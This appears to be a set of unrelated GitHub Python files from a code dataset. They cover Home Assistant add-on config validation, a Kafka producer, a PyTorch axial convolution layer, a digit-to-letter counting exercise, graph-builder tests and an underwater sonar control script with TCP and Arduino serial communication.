docker_image,\n docker_ports,\n docker_ports_description,\n network_port,\n token,\n uuid_match,\n version_tag,\n)\nfrom .const import ATTR_BACKUP, ATTR_CODENOTARY, RE_SLUG, AddonBackupMode\nfrom .options import RE_SCHEMA_ELEMENT\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\nRE_VOLUME = re.compile(r\"^(config|ssl|addons|backup|share|media)(?::(rw|ro))?$\")\nRE_SERVICE = re.compile(r\"^(?Pmqtt|mysql):(?Pprovide|want|need)$\")\n\n\nRE_DOCKER_IMAGE_BUILD = re.compile(\n r\"^([a-zA-Z\\-\\.:\\d{}]+/)*?([\\-\\w{}]+)/([\\-\\w{}]+)(:[\\.\\-\\w{}]+)?$\"\n)\n\nSCHEMA_ELEMENT = vol.Match(RE_SCHEMA_ELEMENT)\n\nRE_MACHINE = re.compile(\n r\"^!?(?:\"\n r\"|intel-nuc\"\n r\"|generic-x86-64\"\n r\"|odroid-c2\"\n r\"|odroid-c4\"\n r\"|odroid-m1\"\n r\"|odroid-n2\"\n r\"|odroid-xu\"\n r\"|qemuarm-64\"\n r\"|qemuarm\"\n r\"|qemux86-64\"\n r\"|qemux86\"\n r\"|raspberrypi\"\n r\"|raspberrypi2\"\n r\"|raspberrypi3-64\"\n r\"|raspberrypi3\"\n r\"|raspberrypi4-64\"\n r\"|raspberrypi4\"\n r\"|yellow\"\n r\"|green\"\n r\"|tinker\"\n r\")$\"\n)\n\nRE_SLUG_FIELD = re.compile(r\"^\" + RE_SLUG + r\"$\")\n\n\ndef _warn_addon_config(config: dict[str, Any]):\n \"\"\"Warn about miss configs.\"\"\"\n name = config.get(ATTR_NAME)\n if not name:\n raise vol.Invalid(\"Invalid Add-on config!\")\n\n if config.get(ATTR_FULL_ACCESS, False) and (\n config.get(ATTR_DEVICES)\n or config.get(ATTR_UART)\n or config.get(ATTR_USB)\n or config.get(ATTR_GPIO)\n ):\n _LOGGER.warning(\n \"Add-on have full device access, and selective device access in the configuration. Please report this to the maintainer of %s\",\n name,\n )\n\n if config.get(ATTR_BACKUP, AddonBackupMode.HOT) == AddonBackupMode.COLD and (\n config.get(ATTR_BACKUP_POST) or config.get(ATTR_BACKUP_PRE)\n ):\n _LOGGER.warning(\n \"Add-on which only support COLD backups trying to use post/pre commands. Please report this to the maintainer of %s\",\n name,\n )\n\n invalid_services: list[str] = []\n for service in config.get(ATTR_DISCOVERY, []):\n try:\n valid_discovery_service(service)\n except vol.Invalid:\n invalid_services.append(service)\n\n if invalid_services:\n _LOGGER.warning(\n \"Add-on lists the following unknown services for discovery: %s. Please report this to the maintainer of %s\",\n \", \".join(invalid_services),\n name,\n )\n\n return config\n\n\ndef _migrate_addon_config(protocol=False):\n \"\"\"Migrate addon config.\"\"\"\n\n def _migrate(config: dict[str, Any]):\n name = config.get(ATTR_NAME)\n if not name:\n raise vol.Invalid(\"Invalid Add-on config!\")\n\n # Startup 2018-03-30\n if config.get(ATTR_STARTUP) in (\"before\", \"after\"):\n value = config[ATTR_STARTUP]\n if protocol:\n _LOGGER.warning(\n \"Add-on config 'startup' with '%s' is deprecated. Please report this to the maintainer of %s\",\n value,\n name,\n )\n if value == \"before\":\n config[ATTR_STARTUP] = AddonStartup.SERVICES\n elif value == \"after\":\n config[ATTR_STARTUP] = AddonStartup.APPLICATION\n\n # UART 2021-01-20\n if \"auto_uart\" in config:\n if protocol:\n _LOGGER.warning(\n \"Add-on config 'auto_uart' is deprecated, use 'uart'. Please report this to the maintainer of %s\",\n name,\n )\n config[ATTR_UART] = config.pop(\"auto_uart\")\n\n # Device 2021-01-20\n if ATTR_DEVICES in config and any(\":\" in line for line in config[ATTR_DEVICES]):\n if protocol:\n _LOGGER.warning(\n \"Add-on config 'devices' use a deprecated format, the new format uses a list of paths only. Please report this to the maintainer of %s\",\n name,\n )\n config[ATTR_DEVICES] = [line.split(\":\")[0] for line in config[ATTR_DEVICES]]\n\n # TMPFS 2021-02-01\n if ATTR_TMPFS in config and not isinstance(config[ATTR_TMPFS], bool):\n if protocol:\n _LOGGER.warning(\n \"Add-on config 'tmpfs' use a deprecated format, new it's only a boolean. Please report this to the maintainer of %s\",\n name,\n )\n config[ATTR_TMPFS] = True\n\n # 2021-06 \"snapshot\" renamed to \"backup\"\n for entry in (\n \"snapshot_exclude\",\n \"snapshot_post\",\n \"snapshot_pre\",\n \"snapshot\",\n ):\n if entry in config:\n new_entry = entry.replace(\"snapshot\", \"backup\")\n config[new_entry] = config.pop(entry)\n _LOGGER.warning(\n \"Add-on config '%s' is deprecated, '%s' should be used instead. Please report this to the maintainer of %s\",\n entry,\n new_entry,\n name,\n )\n\n return config\n\n return _migrate\n\n\n# pylint: disable=no-value-for-parameter\n_SCHEMA_ADDON_CONFIG = vol.Schema(\n {\n vol.Required(ATTR_NAME): str,\n vol.Required(ATTR_VERSION): version_tag,\n vol.Required(ATTR_SLUG): vol.Match(RE_SLUG_FIELD),\n vol.Required(ATTR_DESCRIPTON): str,\n vol.Required(ATTR_ARCH): [vol.In(ARCH_ALL)],\n vol.Optional(ATTR_MACHINE): vol.All([vol.Match(RE_MACHINE)], vol.Unique()),\n vol.Optional(ATTR_URL): vol.Url(),\n vol.Optional(ATTR_STARTUP, default=AddonStartup.APPLICATION): vol.Coerce(\n AddonStartup\n ),\n vol.Optional(ATTR_BOOT, default=AddonBoot.AUTO): vol.Coerce(AddonBoot),\n vol.Optional(ATTR_INIT, default=True): vol.Boolean(),\n vol.Optional(ATTR_ADVANCED, default=False): vol.Boolean(),\n vol.Optional(ATTR_STAGE, default=AddonStage.STABLE): vol.Coerce(AddonStage),\n vol.Optional(ATTR_PORTS): docker_ports,\n vol.Optional(ATTR_PORTS_DESCRIPTION): docker_ports_description,\n vol.Optional(ATTR_WATCHDOG): vol.Match(\n r\"^(?:https?|\\[PROTO:\\w+\\]|tcp):\\/\\/\\[HOST\\]:(\\[PORT:\\d+\\]|\\d+).*$\"\n ),\n vol.Optional(ATTR_WEBUI): vol.Match(\n r\"^(?:https?|\\[PROTO:\\w+\\]):\\/\\/\\[HOST\\]:\\[PORT:\\d+\\].*$\"\n ),\n vol.Optional(ATTR_INGRESS, default=False): vol.Boolean(),\n vol.Optional(ATTR_INGRESS_PORT, default=8099): vol.Any(\n network_port, vol.Equal(0)\n ),\n vol.Optional(ATTR_INGRESS_ENTRY): str,\n vol.Optional(ATTR_INGRESS_STREAM, default=False): vol.Boolean(),\n vol.Optional(ATTR_PANEL_ICON, default=\"mdi:puzzle\"): str,\n vol.Optional(ATTR_PANEL_TITLE): str,\n vol.Optional(ATTR_PANEL_ADMIN, default=True): vol.Boolean(),\n vol.Optional(ATTR_HOMEASSISTANT): version_tag,\n vol.Optional(ATTR_HOST_NETWORK, default=False): vol.Boolean(),\n vol.Optional(ATTR_HOST_PID, default=False): vol.Boolean(),\n vol.Optional(ATTR_HOST_IPC, default=False): vol.Boolean(),\n vol.Optional(ATTR_HOST_UTS, default=False): vol.Boolean(),\n vol.Optional(ATTR_HOST_DBUS, default=False): vol.Boolean(),\n vol.Optional(ATTR_DEVICES): [str],\n vol.Optional(ATTR_UDEV, default=False): vol.Boolean(),\n vol.Optional(ATTR_TMPFS, default=False): vol.Boolean(),\n vol.Optional(ATTR_MAP, default=list): [vol.Match(RE_VOLUME)],\n vol.Optional(ATTR_ENVIRONMENT): {vol.Match(r\"\\w*\"): str},\n vol.Optional(ATTR_PRIVILEGED): [vol.Coerce(Capabilities)],\n vol.Optional(ATTR_APPARMOR, default=True): vol.Boolean(),\n vol.Optional(ATTR_FULL_ACCESS, default=False): vol.Boolean(),\n vol.Optional(ATTR_AUDIO, default=False): vol.Boolean(),\n vol.Optional(ATTR_VIDEO, default=False): vol.Boolean(),\n vol.Optional(ATTR_GPIO, default=False): vol.Boolean(),\n vol.Optional(ATTR_USB, default=False): vol.Boolean(),\n vol.Optional(ATTR_UART, default=False): vol.Boolean(),\n vol.Optional(ATTR_DEVICETREE, default=False): vol.Boolean(),\n vol.Optional(ATTR_KERNEL_MODULES, default=False): vol.Boolean(),\n vol.Optional(ATTR_REALTIME, default=False): vol.Boolean(),\n vol.Optional(ATTR_HASSIO_API, default=False): vol.Boolean(),\n vol.Optional(ATTR_HASSIO_ROLE, default=ROLE_DEFAULT): vol.In(ROLE_ALL),\n vol.Optional(ATTR_HOMEASSISTANT_API, default=False): vol.Boolean(),\n vol.Optional(ATTR_STDIN, default=False): vol.Boolean(),\n vol.Optional(ATTR_LEGACY, default=False): vol.Boolean(),\n vol.Optional(ATTR_DOCKER_API, default=False): vol.Boolean(),\n vol.Optional(ATTR_AUTH_API, default=False): vol.Boolean(),\n vol.Optional(ATTR_SERVICES): [vol.Match(RE_SERVICE)],\n vol.Optional(ATTR_DISCOVERY): [str],\n vol.Optional(ATTR_BACKUP_EXCLUDE): [str],\n vol.Optional(ATTR_BACKUP_PRE): str,\n vol.Optional(ATTR_BACKUP_POST): str,\n vol.Optional(ATTR_BACKUP, default=AddonBackupMode.HOT): vol.Coerce(\n AddonBackupMode\n ),\n vol.Optional(ATTR_CODENOTARY): vol.Email(),\n vol.Optional(ATTR_OPTIONS, default={}): dict,\n vol.Optional(ATTR_SCHEMA, default={}): vol.Any(\n vol.Schema(\n {\n str: vol.Any(\n SCHEMA_ELEMENT,\n [\n vol.Any(\n SCHEMA_ELEMENT,\n {str: vol.Any(SCHEMA_ELEMENT, [SCHEMA_ELEMENT])},\n )\n ],\n vol.Schema({str: vol.Any(SCHEMA_ELEMENT, [SCHEMA_ELEMENT])}),\n )\n }\n ),\n False,\n ),\n vol.Optional(ATTR_IMAGE): docker_image,\n vol.Optional(ATTR_TIMEOUT, default=10): vol.All(\n vol.Coerce(int), vol.Range(min=10, max=300)\n ),\n vol.Optional(ATTR_JOURNALD, default=False): vol.Boolean(),\n },\n extra=vol.REMOVE_EXTRA,\n)\n\nSCHEMA_ADDON_CONFIG = vol.All(\n _migrate_addon_config(True), _warn_addon_config, _SCHEMA_ADDON_CONFIG\n)\n\n\n# pylint: disable=no-value-for-parameter\nSCHEMA_BUILD_CONFIG = vol.Schema(\n {\n vol.Optional(ATTR_BUILD_FROM, default=dict): vol.Any(\n vol.Match(RE_DOCKER_IMAGE_BUILD),\n vol.Schema({vol.In(ARCH_ALL): vol.Match(RE_DOCKER_IMAGE_BUILD)}),\n ),\n vol.Optional(ATTR_SQUASH, default=False): vol.Boolean(),\n vol.Optional(ATTR_ARGS, default=dict): vol.Schema({str: str}),\n vol.Optional(ATTR_LABELS, default=dict): vol.Schema({str: str}),\n },\n extra=vol.REMOVE_EXTRA,\n)\n\nSCHEMA_TRANSLATION_CONFIGURATION = vol.Schema(\n {\n vol.Required(ATTR_NAME): str,\n vol.Optional(ATTR_DESCRIPTON): vol.Maybe(str),\n },\n extra=vol.REMOVE_EXTRA,\n)\n\n\nSCHEMA_ADDON_TRANSLATIONS = vol.Schema(\n {\n vol.Optional(ATTR_CONFIGURATION): {str: SCHEMA_TRANSLATION_CONFIGURATION},\n vol.Optional(ATTR_NETWORK): {str: str},\n },\n extra=vol.REMOVE_EXTRA,\n)\n\n\n# pylint: disable=no-value-for-parameter\nSCHEMA_ADDON_USER = vol.Schema(\n {\n vol.Required(ATTR_VERSION): version_tag,\n vol.Optional(ATTR_IMAGE): docker_image,\n vol.Optional(ATTR_UUID, default=lambda: uuid.uuid4().hex): uuid_match,\n vol.Optional(ATTR_ACCESS_TOKEN): token,\n vol.Optional(ATTR_INGRESS_TOKEN, default=secrets.token_urlsafe): str,\n vol.Optional(ATTR_OPTIONS, default=dict): dict,\n vol.Optional(ATTR_AUTO_UPDATE, default=False): vol.Boolean(),\n vol.Optional(ATTR_BOOT): vol.Coerce(AddonBoot),\n vol.Optional(ATTR_NETWORK): docker_ports,\n vol.Optional(ATTR_AUDIO_OUTPUT): vol.Maybe(str),\n vol.Optional(ATTR_AUDIO_INPUT): vol.Maybe(str),\n vol.Optional(ATTR_PROTECTED, default=True): vol.Boolean(),\n vol.Optional(ATTR_INGRESS_PANEL, default=False): vol.Boolean(),\n vol.Optional(ATTR_WATCHDOG, default=False): vol.Boolean(),\n },\n extra=vol.REMOVE_EXTRA,\n)\n\nSCHEMA_ADDON_SYSTEM = vol.All(\n _migrate_addon_config(),\n _SCHEMA_ADDON_CONFIG.extend(\n {\n vol.Required(ATTR_LOCATON): str,\n vol.Required(ATTR_REPOSITORY): str,\n vol.Required(ATTR_TRANSLATIONS, default=dict): {\n str: SCHEMA_ADDON_TRANSLATIONS\n },\n }\n ),\n)\n\n\nSCHEMA_ADDONS_FILE = vol.Schema(\n {\n vol.Optional(ATTR_USER, default=dict): {str: SCHEMA_ADDON_USER},\n vol.Optional(ATTR_SYSTEM, default=dict): {str: SCHEMA_ADDON_SYSTEM},\n },\n extra=vol.REMOVE_EXTRA,\n)\n\n\nSCHEMA_ADDON_BACKUP = vol.Schema(\n {\n vol.Required(ATTR_USER): SCHEMA_ADDON_USER,\n vol.Required(ATTR_SYSTEM): SCHEMA_ADDON_SYSTEM,\n vol.Required(ATTR_STATE): vol.Coerce(AddonState),\n vol.Required(ATTR_VERSION): version_tag,\n },\n extra=vol.REMOVE_EXTRA,\n)\n","repo_name":"home-assistant/supervisor","sub_path":"supervisor/addons/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":14965,"program_lang":"python","lang":"en","doc_type":"code","stars":1510,"dataset":"github-code","pt":"3"} +{"seq_id":"17746737736","text":"from .kafka.config import KafkaProducerConfig\nfrom .kafka.producer import KafkaProducer\n\nfrom .event import Event\nfrom .schema_registry import SchemaRegistry\n\n\nclass DataStreamingProducer:\n def __init__(\n self,\n topic: str,\n kafka_config: KafkaProducerConfig,\n schema_registry: SchemaRegistry,\n ):\n self.topic = topic\n self.name = kafka_config.client_id\n self.producer = KafkaProducer(kafka_config)\n self.schema_registry = schema_registry\n\n def validate_event(self, event: Event):\n self.schema_registry.validate(\n event.dict(),\n event.event_name.value,\n event.event_version,\n )\n return\n\n def produce_event(self, event: Event):\n self.producer.produce(self.topic, event.json())\n return\n\n def start(self):\n self.producer.start()\n\n def stop(self):\n self.producer.stop()\n","repo_name":"vdnsnkv/awesome-tes","sub_path":"py_lib/data_streaming_producer.py","file_name":"data_streaming_producer.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43636085818","text":"import torch as t\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass AxialConv(nn.Module):\n def __init__(\n self,\n in_channels,\n out_channels,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n bias=True,\n ):\n super().__init__()\n self.conv1 = nn.Conv2d(\n in_channels,\n in_channels,\n (4, 1),\n stride,\n \"same\",\n dilation,\n groups,\n bias,\n )\n self.conv2 = nn.Conv2d(\n in_channels,\n out_channels,\n (5, 1),\n stride,\n \"same\",\n dilation,\n groups,\n bias,\n )\n\n def forward(self, x):\n x_1 = self.conv1(x)\n x_2 = self.conv2(x.transpose(0, 1, 3, 2)).transpose(0, 1, 3, 2)\n return F.relu(x_1 + x_2)\n\n def get_attention_scores(self):\n res = self.conv1.weight.detach().cpu().abs().mean(dim=1, keepdim=True), self.conv2.weight.detach().cpu().abs().mean(dim=1, keepdim=True)\n return res\n","repo_name":"SalamanderXing/weather-prediction","sub_path":"main/torch_model_modules/axial_conv.py","file_name":"axial_conv.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5648804196","text":"# -*- coding:utf-8 -*-\n\"\"\"\n给定一个数字,按照如下规则翻译成字符串:0翻译成“a”,1翻译成“b”...25翻译成“z”。一个数字有多种翻译可能,\n例如12258一共有5种,分别是bccfi,bwfi,bczi,mcfi,mzi。实现一个函数,用来计算一个数字有多少种不同的翻译方法。\n动态规划问题\n 12258\n / \\\n b+2258 m+258\n / \\ / \\\n bc+258 bw+58 mc+58 mz+8\n / \\ \\ \\ \\\n bcc+58 bcz+8 bwf+8 mcf+8 mzi\n / \\ \\ \\\n bccf+8 bczi bwfi mcfi\n /\n bccfi\n自下而上,也可以叫从右往左,动态规划,从最小的问题开始 :\nf(r)表示以r为开始(r最小取0)到最右端所组成的数字能够翻译成字符串的种数。对于长度为n的数字,f(n)=0,f(n-1)=1,求f(0)。\n递推公式(转移矩阵)为 f(r-2) = f(r-1)+g(r-2,r-1)*f(r);\n其中,如果r-2,r-1能够翻译成字符,则g(r-2,r-1)=1,否则为0。\n因此,对于12258:\nf(5) = 0\nf(4) = 1\nf(3) = f(4)+0 = 1\nf(2) = f(3)+f(4) = 2\nf(1) = f(2)+f(3) = 3\nf(0) = f(1)+f(2) = 5\n作者:ryderchan\n链接:https://www.jianshu.com/p/80e1841909b7\n\"\"\"\n\n\nclass Solution:\n def trans_num_str(self, numbers):\n if numbers < 0:\n return 0\n str_num = str(numbers)\n print(\"old\", self.get_trans_count(str_num))\n print(\"new\", self.get_trans_count_2(str_num))\n return self.get_trans_count(str_num)\n\n def get_trans_count(self, str_num):\n length = len(str_num)\n counts = [0] * length\n for i in range(length - 1, -1, -1):\n if i < length - 1:\n count = counts[i + 1]\n else:\n count = 1\n\n if i < length - 1:\n digit1 = int(str_num[i])\n digit2 = int(str_num[i + 1])\n covered = digit1 * 10 + digit2\n if 10 <= covered <= 25:\n if i < length - 2:\n count += counts[i + 2]\n else:\n count += 1\n # print(count, i)\n counts[i] = count\n # print(counts)\n return counts[0]\n\n def get_trans_count_2(self, str_num):\n length = len(str_num)\n res = [0]*(length-1) + [1, 1]\n for i in range(length - 2, -1, -1):\n # if \"{}{}\".format(str_num[i], str_num[i+1]) < \"26\":\n if str_num[i:i + 2] < \"26\":\n g = 1\n else:\n g = 0\n res[i] = res[i+1] + res[i+2]*g\n return res[0]\n\n def get_tran_count_3(self, num):\n \"\"\"自前向后,类似爬楼梯\"\"\"\n size = len(num)\n if size <= 1:\n return 1\n dp = [0] * size\n dp[0] = 1\n dp[1] = 2 if 10 <= int(num[:2]) < 26 else 1\n for i in range(2, size):\n dp[i] = dp[i-1] + dp[i-2] if 10 <= int(num[i-1:i+1]) < 26 else dp[i-1]\n return dp[-1]\n\n\nif __name__ == '__main__':\n s = Solution()\n s.trans_num_str(12258)\n print(s.get_tran_count_3(\"12818\"))\n","repo_name":"a625687551/Leetcode","sub_path":"TargetOffer/46、把数字翻译成字符串.py","file_name":"46、把数字翻译成字符串.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36039323985","text":"import Implementations.GraphBuilder.simple_graph_builder as gb\nfrom Framework.Matchers.simple_matcher import SimpleMatcher\nfrom Implementations.Graphs.networkx_graph import NetworkxGraph\n\nrev1 = [\n \"a\",\n \"b.1\",\n \"b.2\",\n \"c\",\n \"b.3\"\n]\n\nrev2 = [\n \"a\",\n \"b.1\",\n \"b.2\",\n \"b.3\",\n \"c\"\n]\n\nrev3 = [\n \"a.1\",\n \"b.1\",\n \"b.2\",\n \"b.3\",\n \"d\",\n \"e.1\",\n \"e.2\"\n]\n\nrev4 = [\n \"b.1\",\n \"b.2\",\n \"d\",\n \"e.2\"\n]\n\n\n# def main():\n# # revisions = [rev1, rev2, rev3, rev4]\n# revisions = [rev1, rev2]\n# gb_obj = gb.GraphBuilder()\n# beginning = gb_obj.build_graph(revisions)\n#\n# main()\n\ndef test_check_displacement():\n rev1 = [\n \"a\",\n \"b.1\",\n \"b.2\",\n \"c\",\n \"b.3\"\n ]\n\n rev2 = [\n \"a\",\n \"b.1\",\n \"b.2\",\n \"b.3\",\n \"c\"\n ]\n\n revisions = [rev1, rev2]\n networkx_graph = NetworkxGraph()\n simple_matcher = SimpleMatcher()\n gb_obj = gb.SimpleGraphBuilder(simple_matcher)\n beginning = gb_obj.build_graph(revisions)\n\n assert beginning[1][3].label == \"u\"\n assert beginning[1][4].label == \"a\"\n\n\ndef test_mutation_of_lines():\n rev1 = [\n \"a\",\n \"b\",\n \"c\",\n \"d\",\n \"e\"\n ]\n\n rev2 = [\n \"a\",\n \"b.1\",\n \"b.2\",\n \"c\",\n \"d\",\n \"e.1\"\n ]\n beginning = None\n revisions = [rev1, rev2]\n networkx_graph = NetworkxGraph()\n simple_matcher = SimpleMatcher()\n gb_obj = gb.GraphBuilder(simple_matcher, networkx_graph)\n beginning = gb_obj.build_graph(revisions)\n gb_obj.slice_line(1, 2)\n\n assert beginning[1][0].label == \"u\"\n assert beginning[1][1].label == \"c\"\n assert beginning[1][2].label == \"c\"\n assert beginning[1][3].label == \"u\"\n assert beginning[1][4].label == \"u\"\n assert beginning[1][5].label == \"c\"\n\n\ndef test_right_addition():\n rev1 = [\n \"a\",\n \"b\",\n \"c\",\n \"d\",\n \"e\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"fd\"\n ]\n\n rev2 = [\n \"a\",\n \"b\",\n \"f\",\n \"c\",\n \"d\",\n \"e\",\n \"\",\n \"\",\n \"yz\"\n ]\n beginning = None\n revisions = [rev1, rev2]\n networkx_graph = NetworkxGraph()\n simple_matcher = SimpleMatcher()\n gb_obj = gb.SimpleGraphBuilder(simple_matcher)\n beginning = gb_obj.build_graph(revisions)\n\n assert beginning[0][2].label == \"a\"\n assert beginning[1][2].label == \"a\"\n assert beginning[1][3].label == \"u\"\n assert beginning[1][3].content == rev1[2]\n assert beginning[1][4].label == \"u\"\n assert beginning[1][5].label == \"u\"\n\n\ndef test_blanks():\n rev1 = [\n \"e\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"fd\"\n ]\n\n rev2 = [\n \"e\",\n \"\",\n \"\",\n \"yz\"\n ]\n beginning = None\n revisions = [rev1, rev2]\n networkx_graph = NetworkxGraph()\n simple_matcher = SimpleMatcher()\n gb_obj = gb.GraphBuilder(simple_matcher, networkx_graph)\n beginning = gb_obj.build_graph(revisions)\n\n assert beginning[0][1].label == \"a\"\n assert beginning[0][2].label == \"a\"\n assert beginning[0][3].label == \"d\"\n assert beginning[0][4].label == \"d\"\n assert beginning[0][5].label == \"d\"\n assert beginning[0][6].label == \"d\"\n assert beginning[1][1].label == \"u\"\n assert beginning[1][2].label == \"u\"\n assert beginning[1][3].label == \"a\"\n\n\ndef ReadTextFromFile(file_name):\n f = open(file_name, \"r\")\n return f.read().split('\\n')\n\n\ndef test_with_actual_files():\n rev1 = ReadTextFromFile(\"Data/Rev1\")\n rev2 = ReadTextFromFile(\"Data/Rev2\")\n revisions = [rev1, rev2]\n networkx_graph = NetworkxGraph()\n simple_matcher = SimpleMatcher()\n gb_obj = gb.GraphBuilder(simple_matcher, networkx_graph)\n beginning = gb_obj.build_graph(revisions)\n gb_obj.slice_line(1, 1)\n print(beginning[1][1].content)\n\n\ntest_with_actual_files()\n# test_check_displacement()\n# test_mutation_of_lines()\n# test_right_addition()\n# test_blanks()\n\n\n\n\n\n\n\n","repo_name":"saurabhc123/cs5704","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20177599107","text":"\n#!/usr/bin/env python3\nimport serial\nimport time\nimport numpy as np\n# import matplotlib.pyplot as plt\n# import cv2\n\n# Custom libraries imports\nfrom sonarFunctionality.BlueRoboticsSonar import Ping360\nfrom sonarFunctionality.Interlocking import InterlockingSystem\n# import communication.GUI_communication\n# from communication.GUI_communication import communicationWithGUI\nimport config\n\n\nimport json # Serialization of data for Arduino communication\nimport threading\n\n\n\n\nif __name__ == \"__main__\":\n import argparse\n import cv2\n import numpy as np\n from math import *\n\n # Taking in connection details when running script in terminal\n parser = argparse.ArgumentParser(description=\"Ping python library example.\")\n parser.add_argument('--device', action=\"store\", required=True, type=str, help=\"Ping device port.\")\n parser.add_argument('--baudrate', action=\"store\", type=int, default=2000000, help=\"Ping device baudrate.\")\n args = parser.parse_args()\n\n # Establishes connection to Ping 360 sonar\n p = Ping360()\n p.connect_serial(args.device, args.baudrate) # Added this to get working\n\n # Initialization parameters\n print(\"Initialized: %s\" % p.initialize())\n p.set_transmit_frequency(1000) # Original: 1000\n p.set_sample_period(50) # Original: 80 Sets sample period in ticks\n p.set_number_of_samples(1200) # Original: 500 Determines the resolution (higher num -> finer details)\n p.set_range(50) # Range on start up\n\n # Initalize interlocking system for motor driving zones\n ils = InterlockingSystem()\n\n # Variables\n max_range = 80*200*1450/2\n length = 640\n image = np.zeros((length, length, 1), np.uint8)\n angle = 0\n objectData = []\n operatorForceReset = False\n\n # Global variables used in communication\n #x = 10\n #y = 20\n\n # TCP communication variables\n HOST = \"169.254.226.72\" # The IP address of the RASPBERRY Pi assigns to this communication\n PORT = 1422 # Port to listen on (non-privileged ports are > 1023)\n\n\n import socket\n import pickle # Serialization of data for GUI communication\n import cv2\n import numpy as np\n\n\n def communicationWithGUI(HOST, PORT):\n\n HEADERSIZE = 10\n address = \"\"\n\n # Establishes a reliable and in-order data delivery TCP connection\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((HOST, PORT)) # Binds port to requested IP and Port\n s.listen(2) # Specifies number of unaccepted connection before refusing new\n\n print(\"OPENING CAMERA PORT\")\n cam = cv2.VideoCapture(2) # Initializes connection to camera\n\n\n while True:\n receiving = True # When beginning while loop we want to receive a message from GUI\n\n if not address: # If no address is given, try to find one\n clientsocket, address = s.accept()\n print(f\"Connection from {address} has been established.\")\n\n ret_val, img = cam.read() # Takes a photo with camera\n compressed = commpressImage(img, 10) # Compressing image\n\n # Finalizing dicitionary with all values to be sent to GUI\n d = {\n \"key1\": compressed,\n \"key2\": 232,\n \"key3\": [True, False, True],\n \"key4\": 23\n }\n\n # Serializing the dicitionary and sending\n msg = pickle.dumps(d)\n msg = bytes(f\"{len(msg):<{HEADERSIZE}}\", 'utf-8') + msg\n clientsocket.send(msg)\n\n\n # Receiving answer from computer\n while receiving:\n full_msg = b''\n new_msg = True\n while receiving:\n incoming_message = clientsocket.recv(20000)\n # print(incoming_message)\n if new_msg: # Changed rom if new_msg\n msglen = int(incoming_message[:HEADERSIZE])\n new_msg = False\n\n full_msg += incoming_message\n\n if len(full_msg)-HEADERSIZE == msglen:\n response = pickle.loads(full_msg[HEADERSIZE:]) # Deserialize reponse from GUI\n global x\n global y\n # Setting the global variables accordingly\n x = response[\"key1\"]\n print(f'X value inside thread {x}')\n\n # Resetting variables for next iteration\n receiving = False\n new_msg = True\n full_msg = b''\n\n\n def commpressImage(img, k):\n width = int((img.shape[1])/k)\n height = int((img.shape[0])/k)\n return cv2.resize(img, (width, height), interpolation=cv2.INTER_AREA)\n\n\n\n\n def changeOperatingMode(mode):\n # Checks if input is different from last iteration\n if mode == 0:\n p.set_range(2) # Short range collision avoidance mode\n p.set_step(8)\n p.set_gain_setting(0)\n elif mode == 1:\n p.set_range(4) # Medium range collision avoidance mode\n p.set_step(4)\n p.set_gain_setting(0)\n elif mode == 2:\n p.set_range(50) # Aquaculture inspection mode\n p.set_step(2)\n p.set_gain_setting(1)\n else:\n print(\"Did not recognize mode command\")\n print(\"Corrupt or invalid data given\")\n return\n\n # Start a thread that handles communication with GUI\n t1 = threading.Thread(target=communicationWithGUI, args=[HOST, PORT])\n t1.start()\n\n # Initialize serial communication with Arduino UNO\n ardSer = serial.Serial('/dev/ttyACM1', 9600, timeout=1,\n parity=serial.PARITY_NONE, bytesize=serial.EIGHTBITS, stopbits=serial.STOPBITS_ONE)\n\n print(\"CONNECTION WITH ARDUINO ESTABLISED\")\n\n\n while(True):\n theta_ = []\n r_ = []\n color_ = []\n p.transmitAngle(angle)\n data = bytearray(getattr(p,'_data'))\n data_lst = []\n\n # print(f\"{len(data)} number of values in data\")\n\n for k in data :\n data_lst.append(k)\n\n # Drastic speed up when disabling the plotting of scanned map, have to handle this on surface\n \"\"\"\n center = (length/2,length/2)\n linear_factor = len(data_lst)/center[0]\n for i in range(int(center[0])):\n if(i < center[0]*max_range/max_range):\n try:\n pointColor = data_lst[int(i*linear_factor-1)]\n except IndexError:\n pointColor = 0\n\n else:\n pointColor = 0\n for k in np.linspace(0,p.get_step(),8*p.get_step()):\n image[int(center[0]+i*cos(2*pi*(angle+k)/400)), int(center[1]+i*sin(2*pi*(angle+k)/400)), 0] = pointColor\n\n color = cv2.applyColorMap(image,cv2.COLORMAP_JET)\n cv2.imshow('Sonar Image',image)\n cv2.waitKey(25)\n \"\"\"\n\n # SERIAL WITH ARDUINO\n ArdDataOut = {}\n print(f'X value outside thread {config.x}')\n ArdDataOut[\"light\"] = 1 # SET BY GUI: 0-255 light settings\n ArdDataOut[\"runZone\"] = 1 # SET BY GUI: 1-8 Linear directions, 9 and 10 clock and counter-clock respectively\n ArdDataOut[\"locked\"] = ils.lockedZones\n ArdDataOut = json.dumps(ArdDataOut)\n\n # If program takes longer to run, there might be problem with serial\n # Band-aid solution could be to add delay in Arduino C++ script\n print(\"One loop in Python\")\n if ardSer.in_waiting > 0:\n input_str = ardSer.readline().decode(\"utf-8\").rstrip()\n print(input_str)\n print(ArdDataOut)\n ardSer.write(ArdDataOut.encode())\n\n\n\n\n changeOperatingMode(0) # SET BY GUI\n operatorForceReset = False # SET BY GUI\n # print(f\"The sonar is scanning from 0 to {round(p.get_range(), 2)} meters\")\n # print(f\"Set range is {p.get_range()}, set step is {p.get_step()}\")\n\n\n if operatorForceReset:\n ils.resetAllZones()\n\n # If object is found, interlock current zone\n if ils.findObject(data_lst):\n ils.setInterlockZone(ils.findZone(angle), angle)\n\n # Incrementing next scan, to not automatically reset the set zone above with the under statement\n angle = (angle + p.get_step()) % 400\n # 